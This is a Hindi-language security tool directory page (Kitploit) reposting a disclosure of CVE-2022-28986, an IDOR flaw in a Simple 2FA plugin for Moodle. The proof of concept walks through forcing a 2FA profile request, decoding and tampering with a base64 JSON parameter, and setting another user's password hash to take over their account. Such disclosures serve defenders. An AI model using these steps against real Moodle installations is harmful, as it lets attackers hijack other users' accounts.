Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/flaviupopescu/cve-2022-28986
भेद्यता विश्लेषणआईडीएस/आईपीएस से बचनावेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubflaviupopescu/cve-2022-28986

CVE-2022-28986

एक असुरक्षित प्रत्यक्ष ऑब्जेक्ट संदर्भ (IDOR) भेद्यता "LMS Doctor द्वारा Moodle के लिए Simple 2FA Plugin" में

रिपॉजिटरी देखें
224 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-28986

LMS Doctor द्वारा "Simple 2FA Plugin for Moodle" में एक असुरक्षित प्रत्यक्ष वस्तु संदर्भ (IDOR) भेद्यता

भेद्यता विवरण

जोखिम : गंभीर

विक्रेता: LMS Doctor - Simple 2 Factor Authentication Plugin For Moodle

द्वारा खुलासा: Flaviu Popescu

विवरण: "LMS Doctor" द्वारा Moodle के लिए Simple 2FA Plugin में असुरक्षित प्रत्यक्ष वस्तु संदर्भ (IDOR) भेद्यता। यह दूरस्थ हमलावरों को अन्य उपयोगकर्ता खातों के ईमेल, पासवर्ड और फ़ोन नंबर जैसे संवेदनशील रिकॉर्ड अपडेट करने की अनुमति देता है।

प्रमाण की अवधारणा:

एक स्व-पंजीकृत खाते (dionach.tester) का उपयोग करके प्रारंभिक लॉगिन प्रक्रिया:

POST /login/index.php

चित्र

जैसे ही 2FA प्रॉम्प्ट दिखाया जाता है, हमलावर 2FA कोड प्रदान करने के बजाय निम्नलिखित URL पर जबरन ब्राउज़ करता है।

POST /auth/simple2fa/profile.php

चित्र

यह अनुरोध Burp Suite में कैप्चर किया जाता है: चित्र

पैरामीटर "u" में एक base64 एन्कोडेड स्ट्रिंग होती है। स्ट्रिंग को डिकोड किया जाता है, जो नीचे दिखाए गए अनुसार JSON प्रारूप में डेटा प्रकट करता है:

चित्र

हमलावर JSON डेटा के साथ छेड़छाड़ करता है, id, ईमेल, पासवर्ड और नाम को संशोधित करता है। JSON डेटा को वापस base64 में एन्कोड किया जाता है, Burp Suite में अपडेट किया जाता है, और सर्वर को अग्रेषित किया जाता है।

पासवर्ड के लिए नई हैश पीढ़ी:

root@kitploit:~
$ htpasswd -bnBC 10 "" pwn3d! | tr -d ':\n'\n
$2y$10$g/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy                     

छेड़छाड़ किए गए डेटा का टुकड़ा:

root@kitploit:~
{"id":"8045","auth":"email","confirmed":"1","policyagreed":"0","deleted":"0","suspended":"0","mnethostid":"1","username":"dionach.tester2","password":"$2y$10$g/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy","idnumber":"","firstname":"Dio","lastname":"Nach","email":"flaviu.popescu+1337@[..]", [..]

जिसके परिणामस्वरूप पीड़ित का खाता, id 8045 (dionach.tester2) नीचे दिखाए अनुसार अपडेट हो जाता है:

चित्र

टूल डाउनलोड करें